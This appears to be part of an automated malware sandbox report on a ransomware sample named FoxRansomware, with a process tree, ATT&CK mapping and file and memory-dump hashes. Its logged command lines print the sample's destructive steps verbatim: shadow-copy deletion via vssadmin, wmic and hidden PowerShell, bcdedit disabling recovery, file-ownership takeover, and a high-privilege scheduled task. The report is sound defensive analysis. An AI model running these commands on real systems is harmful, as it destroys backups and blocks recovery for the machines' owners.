  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\nnQ934YZ.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:768
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\nnQ934YZ.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:5896
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\QEN34Dvv.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5660
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\QEN34Dvv.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:6420
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      Suspicious use of WriteProcessMemory
      PID:7804
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:7180
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\d5GRoAio.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:6072
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
    3⤵
    - Views/modifies file attributes
    PID:9160
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:7468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 0AePg1f9.exe -accepteula "store.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:9912
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0AePg1f9.exe
      0AePg1f9.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3416
    - - C:\Users\Admin\AppData\Local\Temp\0AePg1f964.exe
        
        0AePg1f9.exe -accepteula "store.db" -nobanner
        5⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:5816

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\QEN34Dvv.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:6120
- C:\Windows\system32\vssadmin.exe
  vssadmin Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:7028
- C:\Windows\System32\Wbem\WMIC.exe
  wmic SHADOWCOPY DELETE
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:6696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:9660
- - C:\Windows\system32\vssadmin.exe
    "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:5904
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:9404
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1608
- C:\Windows\system32\schtasks.exe
  SCHTASKS /Delete /TN DSHCA /F
  2⤵
  PID:4964

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5256

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\#CORE_README#.rtf

Filesize
8KB

MD5
1de11d8285e72e07b09c24b36d844e34

SHA1
59fc173441512312af604ab97c5c77545f110b09

SHA256
3034ba98f6344296cac013e521a9fe2197a6b7ecb58f74f3094142c8e7d4ce7a

SHA512
6eb4a105c215d80a59a9ef9c7de214256c2c3edcd7ecaeecce4ad6af650a45dd2c54531c98377838859bfcaa22fef0ff619651859f83849d627810cee6f31251

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
47593152f539819e7745742bb7119d73

SHA1
59363a8a6173f7a987e04d7357e028c3727219e9

SHA256
40c264e7e87c90cb707b7f5850b1d73aef089dfac143f7ff13f8f7543bb4076e

SHA512
70bd8bb86a319a26309254bf357f88d1f28762c7b2efd623c80e2aca2ebaae695d3bd23011a925f3c9cd5ae59d20a2b149ed29df500a56dd8808eb1621a0560a

Download Submit
C:\Users\Admin\AppData\Local\Temp\0AePg1f964.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0AePg1f9.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWpi5HfZ.exe

Filesize
1.2MB

MD5
907636b28d162f7110b067a8178fa38c

SHA1
048ae4691fe267e7c8d9eda5361663593747142a

SHA256
6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

SHA512
501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\d5GRoAio.bat

Filesize
246B

MD5
10dc0aa7345601c21c68a12e69cec5cd

SHA1
40cebc4325728c586873ec7bba44ac4dff6c0d77

SHA256
831651c4b3bf39d22aacd354516a52b3d1e79e9892efcf5023b65221a8ea16fd

SHA512
a0fd2a3516ae37378b38636fdaf08a7d7c1632f48287cce5b72b078aa3807c379d0a109312141333cb6a1ff1742b68161776dd9dc81aed22274e1ef1bdaacc42

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_6275EEFC17B9E637.txt

Filesize
11KB

MD5
704d39b393fd2f7c7f9d6afa9929c458

SHA1
185bfb3bbc32ab23999df782b952dc39165e3aaf

SHA256
f75332c7292c562eba7c5bcc148bbb0c5cb8b0d556c86ca21e0d1a4508fe3502

SHA512
7c25758d6f38573bdcc0af6b10617e8338243708422a151e1f7b07f56a4fe2386c38bcbf7cc8d920f34558889d4e19fa5681cb26ac6996fa405f79ba331b2ddf

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\jP0Eg5Gr.txt

Filesize
16B

MD5
17d432845dc7cb55ac69d75cf72f7f5d

SHA1
7f3b6e6ab91b3a13c0611fe6e95befab691d5cc3

SHA256
a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4

SHA512
25054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vzc4gzhu.e2z.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\QEN34Dvv.bat

Filesize
415B

MD5
9213b8f088dd4da2983e521ea3407cdb

SHA1
54bfd105972fa044c66b2f4608a1ce759170ba3c

SHA256
3ad675a9729a57d7884705ec1e27fb59d4506dfa4d33bb13b8ce0ed7142e02b8

SHA512
16d359d916bb73ec5a61d1b4b192ec20ffc6f5d69ff8c0fe787d62b1f986713bbd7b049eb5cf5bdd2179a9e2f9262caa7ebc6b89d0d258d23db04aca04345469

Download Submit
C:\Users\Admin\AppData\Roaming\nnQ934YZ.vbs

Filesize
260B

MD5
1e5ba943b18f49d2fb89d4cc90d1e8af

SHA1
b6a8c08b4d5927c9d5337eca2ef36d5eee37d030

SHA256
2e2c7cc1f40b3cf482f0e84f1a7f12f0cc9df77bd6fe28f0ba4f077e3076d5f3

SHA512
fab6073ea56978d69880d3468aae5ffcb5d2de81e7e7e437f879f78b827a7a65f251d8d30892ec799f6636e6abdf762937fcfb044df38a1b19a62d02ce8ec234

Download Submit
memory/2232-14431-0x0000000000400000-0x000000000053B000-memory.dmp

Filesize
1.2MB

Download
memory/2232-13157-0x0000000000400000-0x000000000053B000-memory.dmp

Filesize
1.2MB

Download
memory/2232-14391-0x0000000000400000-0x000000000053B000-memory.dmp

Filesize
1.2MB

Download
memory/2232-14455-0x0000000000400000-0x000000000053B000-memory.dmp

Filesize
1.2MB

Download
memory/2232-14468-0x0000000000400000-0x000000000053B000-memory.dmp

Filesize
1.2MB

Download
memory/2232-14490-0x0000000000400000-0x000000000053B000-memory.dmp

Filesize
1.2MB

Download
memory/2748-24-0x0000000006360000-0x000000000637E000-memory.dmp

Filesize
120KB

Download
memory/2748-12-0x0000000005CD0000-0x0000000005D36000-memory.dmp

Filesize
408KB

Download
memory/2748-27-0x0000000006860000-0x000000000687A000-memory.dmp

Filesize
104KB

Download
memory/2748-8-0x00000000748D0000-0x0000000075080000-memory.dmp

Filesize
7.7MB

Download
memory/2748-26-0x00000000079A0000-0x000000000801A000-memory.dmp

Filesize
6.5MB

Download
memory/2748-7-0x0000000002A30000-0x0000000002A66000-memory.dmp

Filesize
216KB

Download
memory/2748-25-0x00000000063F0000-0x000000000643C000-memory.dmp

Filesize
304KB

Download
memory/2748-19-0x0000000005DB0000-0x0000000006104000-memory.dmp

Filesize
3.3MB

Download
memory/2748-18-0x0000000005D40000-0x0000000005DA6000-memory.dmp

Filesize
408KB

Download
memory/2748-9-0x0000000002B00000-0x0000000002B10000-memory.dmp

Filesize
64KB

Download
memory/2748-10-0x0000000005530000-0x0000000005B58000-memory.dmp

Filesize
6.2MB

Download
memory/2748-11-0x00000000053B0000-0x00000000053D2000-memory.dmp

Filesize
136KB

Download
memory/2748-30-0x00000000748D0000-0x0000000075080000-memory.dmp

Filesize
7.7MB

Download
memory/2876-14378-0x0000000000400000-0x000000000053B000-memory.dmp

Filesize
1.2MB

Download
memory/2876-14466-0x0000000000400000-0x000000000053B000-memory.dmp

Filesize
1.2MB

Download
memory/2876-13116-0x0000000000400000-0x000000000053B000-memory.dmp

Filesize
1.2MB

Download
memory/3416-14387-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3416-13387-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/9660-14236-0x0000021139830000-0x0000021139878000-memory.dmp

Filesize
288KB

Download
memory/9660-14237-0x00007FFA9C530000-0x00007FFA9CFF1000-memory.dmp

Filesize
10.8MB

Download
memory/9660-14232-0x00000211211D0000-0x00000211211E0000-memory.dmp

Filesize
64KB

Download
memory/9660-14231-0x00000211211D0000-0x00000211211E0000-memory.dmp

Filesize
64KB

Download
memory/9660-14227-0x00007FFA9C530000-0x00007FFA9CFF1000-memory.dmp

Filesize
10.8MB

Download
memory/9660-14220-0x00000211216D0000-0x00000211216F2000-memory.dmp

Filesize
136KB

Download